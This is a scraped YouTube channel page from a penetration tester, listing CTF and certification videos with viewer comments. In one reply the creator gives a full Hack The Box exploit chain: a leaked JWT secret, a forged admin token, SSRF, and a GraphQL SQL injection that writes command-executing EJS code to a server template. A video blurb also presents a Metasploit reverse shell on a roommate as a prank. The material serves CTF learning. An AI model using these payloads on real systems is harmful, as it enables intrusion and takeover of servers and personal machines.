Milos Markovic
Joined 24 Mar 2012
OSCP+ Exam Review 2024
In this video, I reviewed the OSCP+ Exam and what resources I used to prepare for it.
Views: 402
Videos
How Online Copy-Paste Could Expose Your Data #cybersecurity
Views: 49 · 5 months ago
CVE-2023-45539 & CVE-2022-39227 | HTB LockTalk Web Challenge
Views: 77 · 5 months ago
In this video, I went over HTB LockTalk which includes CVE-2023-45539 & CVE-2022-39227.
Data Exfiltration using Curl and Python with SSTI RCE | HTB Labyrinth Linguist Web Challenge
Views: 247 · 5 months ago
In this video, I went over Data exfiltration using Curl and Python with the help of Server-Side Template Injection RCE.
Burp Suite Certified Practitioner Exam Review 2024
Views: 1K · 6 months ago
In this video, I provide an in-depth review of the BSCP Exam, along with valuable tips and strategies to help you prepare and succeed.
Hack The Box Blueprint Heist Web Challenge
Views: 281 · 6 months ago
In today's video, I went over the Blueprint Heist challenge from HTB Business CTF 2024.
Hack The Box Jailbreak Web Challenge
Views: 353 · 6 months ago
In this video, I went over a recently retired HTB Challenge called Jailbreak which was about XXE Injection. Thank you for watching! #hackthebox #XXE #WebAppPentesting #burpsuite
Linux Privilege Escalation with SUID sed Command
Views: 24 · 7 months ago
In this video, I demonstrated a simple privilege escalation technique with the SUID bit set on the sed command. #cybersecurity #linux #privesc #pentesting
OpenVPN Peer Certificate Verification Failure #openvpn #hackthebox
Views: 7K · 10 months ago
In this video, I explained how to overcome the "Peer Certificate Verification Failure" Error message from OpenVPN when connecting to HackTheBox Network from Windows Machine. P.S. I don't know why my mouse is not showing up on the video, sorry for that!
Hacking My Roommate with Metasploit Reverse Shell!
Views: 2.3K · 1 year ago
Hey, hackers and tech enthusiasts! 👋 In this video, I dive into the world of ethical hacking with a touch of humor as I explore the fascinating realm of Metasploit and reverse shells. Join me on this laughter-packed journey as I demonstrate how to use Metasploit for educational purposes, pranking friends in a lighthearted manner. We'll uncover the power of ethical hacking while sharing a few la...
Cloudgoat S3 ACL Error
Views: 177 · 1 year ago
In this video, I talked about how to solve ACL Errors when deploying a Cloudgoat scenario that has an S3 bucket in its resources.
Great video Milos!
Thanks a lot, Culi! :)
didn't work. still get the same error
But how do i solve it on Android?
@Baikanikintrist Hello, thanks for watching! That is a great question! Unfortunately I didn’t test it out on Android so I don’t have an answer.
Hey thanks for the tutorial. But how did you know that the flag.txt is in the root directory? What if the flag.txt was in a folder and in another subfolder etc. ...How to find out?
Hello, no problem, thank you for watching! That is an amazing question! So in this particular scenario, after I identified XML Injection by being able to read /etc/passwd, my next payload was for the flag.txt. So I didn't spend too much time trying to read the flag from other directories such as /home/flag.txt or /var/www/html/flag.txt, etc. When it comes to XXE usually you would try to read local files that are mostly present on every system such as /etc/passwd for UNIX machines or C:/Windows/win.ini on Windows boxes, it can be challenging with XXE to enumerate other files that are not common. In this case, with HTB Challenges we know that we are aiming for flag.txt so if I didn't find it with a payload such as file:///flag.txt I would try different directories such as /home/flag.txt or /opt/flag.txt or similar. I think for this challenge they simply placed it in the current directory so you don't have to spend time enumerating the system for a flag, but rather exploiting XXE Injection. I hope this helps! Please let me know if you have any other questions/thoughts!
Can we use Burp Pro Trial[15 days] version ? On exam?
Thank you for watching! That's a great question! I didn't find much online about this question besides this old Blog Post from PortSwigger's Forum all the way back in 2021: forum.portswigger.net/thread/free-trial-cf41d2d7bc962fd966d168dbd (you might need to scroll down to find a question from user named Tony). According to the PortSwigger reply, they do not check whether you are using a personal license or a company license nor do we check if you are using a purchased license or a trial license. Now since this was 2021, things might have changed. I think it's the best bet to ask in their Discord: discord.com/invite/portswigger
How much did this certification help you to become a web application penetration tester?
Thank you for watching and thank you for the great question! This certificate is by far my favorite one because I enjoy web app pentesting and I love AppSec. If you would like to become a web application pentester I do believe that this certificate can help you a lot because of the wide variety of topics that it covers, and it really forces the learner to understand each vulnerability in depth. This is from knowledge perspective, when it comes to Job Requirement Perspective, I don't have much experience there because I got this certificate after I landed a job, but when I was actively searching for a job I saw multiple job postings listing BSCP as preferred / required cert. Regardless if it's being listed in the Job Description or not, I think this is an amazing cert and it helped me a lot when it comes to exploiting different vulnerabilities and understanding those vulnerabilities / misconfiguration better than before. I hope this helps!
you saved my life lol, ty
@mikemd866 No problem! I am glad that video helped! 🙂
great explanation, btw can you put the exploits so we can copy thanks
Thank you very much! Here are my notes for this challenge with all commands:
1) for /admin & /graphql endpoint i need a valid JWT cookie with a role being set to admin
1.1) I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin
2) I found SSRF when generating report and I was able to call Collaborator
3) I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as: 127.0.0.1/admin?token=<token>
4) I was able to execute GraphQL Queries with the following url 127.0.0.1:1337/graphql?token=<FORGED_ADMIN_TOKEN>&query={getDataByName(name:"John"){name,department,isPresent}}
5) Now this is vulnerable to SQLI because the regex ignores everything after newline character, so we are UNICODING not to break the GraphQL Query, and from there we conducted classic UNION BASED Attack to find out exact number of columns (4): 127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note space after comment since we are using MySQL
5.1) Now payload for combining sql injection with ejs code execution &query={getDataByName(name:"a\u000d\u000a'UNION SELECT '<%- global.process.mainModule.require(`child_process`).execSync(`/readflag`) %>',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}}
6) Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!
@milosmarkovic4566 appreciate it
thanks a lot mate, you explain very well
@imaverygoodguy Thank you very much for watching! I am glad that you found video useful! 🙂
thank you
@closevote Of course, it’s my pleasure! I am glad that video helped!
Thank you. How you became so good?
Of course! Haha far away from good, but thanks! :D
great video
@noragami1555 Thank you! :)
Love it, Milos!!
Thank you! :)
This guy is going to be the best hacker in the world one day!
Haha, thanks Culi! :)
I'm getting same error, was working fine for months and today I got this message, tried your solution and still not working...same error, help
Just had same error pls let me know if ya find a solution
Hmm, that is interesting! I will take a look at it, and I will let you know if I find a solution!
@milosmarkovic4566 UPDATE: I sent an email to Dev and they were just having technical issues, it has been fixed :)
Thanks a lot
Of course, I am glad it helped!
Not working for me...
Hi, what did you try so far, and what is the error message that you are facing?
@milosmarkovic4566 I've figured it out. I was trying first to make it work through WSL2, but then I've tried just regular windows openvpn client, which for some reason and give me this error, but actually the problem was in generated keys (I was playing around with tryhackme). Actually tryhackme, gives u multiple regions, only one for europe keys was working... the other regions (even europe) was giving some errors both wsl2 or windows (in case of windows this error)
@milosmarkovic4566 when i want to connect to tryhackme vpn
This was super helpful - thank you!
Thank you for watching! I am glad that video helped out! :)
Awesome, thank you!
No problem! Thank you for watching! :)
Thank you so much
Of course! I am glad that the video helped!
Can you do one more help? I got a foothold for a machine trying to load the RCE payload but when entering openvpn ip it's not giving me shell even though everything is correct
I would suggest checking your payload one more time, if you are successfully connected via OpenVPN there is no reason not to obtain the shell if everything is in place. I don't want to reveal any big spoilers, but I suggest checking what version of ysoserial you are using, and I was using PowerShell base64 encoded payload. I hope this helps!
Thank you so much 🙌🙌🙌
No Problem! I am glad that video helped! 🙂
Thank you Milos!
Thank you for watching!
Great content as usual!
Thank you a lot!
Bro thanks so much am ur new subscriber from Africa it really help me coz i get this error for so long god bless more content 🎉🎉
Thank you very much! I am happy that the video helped out! I am working actively on more content! :)
i had similar problem with iOS and Android mobile connection, they play with this solution, thanks
I didn’t know that this error is occurring on mobile devices as well! I am glad that video helped!
in my machine, only your instructed way can't solve this issue, so i regenerate the (.OVPN) file again. After that download and load it to OpenVpn apply your instructed setting and its booom. Connected ! [I said all of those things because someone might get solution from my comment]
You are not the only one that had the same problem doing the same machine, ty
That’s right! I heard that many people were struggling with the same thing. No problem, I am glad it helped!
good tutorial make more for metasploit and reverse shell
Thank you! I appreciate it a lot! Noted, will do in the future, for sure!
Does this work if the victim is inside another network??
Hi, thanks for watching! In that case, I believe that would require port forwarding in order to make this happen.
Vanilla metasploit malware gets easily detected 🤣🤣
Yes, when you have AV and when you update your system, unlike my friend! That was the purpose of the video, to highlight the importance of it 🙂. Thank you for watching and commenting! 🙂
I wish you would have shown us your enumeration phase
Thank you for watching and I appreciate the suggestion! Next time I will definitely do so.
555-333 under Metasploit, bro, excellent video
Haha!!! Thanks a lot, lucky! 😁😂
Just keep going like this, you're doing great
@l_u_c_k_y_7 I will, thanks!!
This is the dumbest script kid video I’ve seen, and to all the people in the comments thinking this is real hacking, IT'S NOT! So first, any msfvenom payload is gonna get flagged by AV. It takes a professional to be able to correctly obfuscate the signatures these days. Secondly, why are you even hiding IP addresses on the video? You do know that those IPs are only on your local network right? They’re not actually the real public IPs. If you guys want to learn real offensive security go study with reliable sources, not some script kids
i just want to know why y u hiding your internal ip address
Hi! I just didn't want it exposed, that's all :)
1 sub earned - love these videos
Thank you! It’s much appreciated!
haha very cool, im a sub now. hilarious prank dude XD
Thank you @RAZREXE ! Much appreciated!!
hahaha that smile on your face when he finds out.
Haha, that was more than funny! 😂
Can I study with you🙏...
Of course! Find me on Discord @wr00m_
I was going to ask the same thing. @milosmarkovic4566
Cool stuff, we need more videos like this!
Thanks Dragan!!
Hahahah this is hilarious dude… great work on this one!
Thanks Filip!!
Haha, brilliant! I will definitely use this to prank my friends!
Thanks Marko!!